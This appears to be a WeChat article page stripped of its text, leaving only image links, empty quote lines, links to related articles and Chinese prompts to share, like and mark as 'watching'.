![](https://mmbiz.qpic.cn/mmbiz_jpg/1HyKzSU2XXOdeQx0thlyozF2swQTEN9iaaBNDG0jTKfAgqgdesve8x5IEWNvYxjF6sAWjO1TPCZVsWd0oiaDn3uw/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1 "")
>
>
>
>
>
>
>
>
>
>
>
>
>
>
![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMyyClGk1cttkSBbJicAn5drpXEbFIeChG9IkrslYEylRF4Z6KNaxNafDwr5ibcYaZXdnveQCNIr5kw/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMZPiaDBD8yxbIHiciauWK4tuiaMcJkA69QYZ9T4jmc3fdN6EA7Qq9A8E3RWcTKhxVEU1QjqOgrJMu2Qg/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ7JfyOicficFrgrD4BHnIMtgCpBbsSUBsQ0N7pHC7YpU8BrZWWwMMghoQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
点分享
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302087&idx=1&sn=29d91904d6471c4b09f4e574ba18a9b2&chksm=bd1c3a4c8a6bb35aa4ddffc0f3e2e6dad475257be18f96f5150c4e948b492f32b1911a6ea435&token=21436342&lang=zh_CN&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMZPiaDBD8yxbIHiciauWK4tuiaiaRXdw4BFsc7MxzkVZaKGgtjWA5GKtUfm3hlgzsBtjJ0mnh9QibeFOGQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "")
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302006&idx=1&sn=18f06c456804659378cf23a5c474e775&scene=21#wechat_redirect)
点点赞
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651253272&idx=1&sn=82468d927062b7427e3ca8a912cb2dc7&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMZPiaDBD8yxbIHiciauWK4tuiaeiaNlRO9954g4VS87icD7KQdxzokTGDIjmCJA563IwfStoFzPUaliauXg/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/mmbiz_gif/qq5rfBadR3icF8RMnJbsqatMibR6OicVrUDaz0fyxNtBDpPlLfibJZILzHQcwaKkb4ia57xAShIJfQ54HjOG1oPXBew/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "")
点在看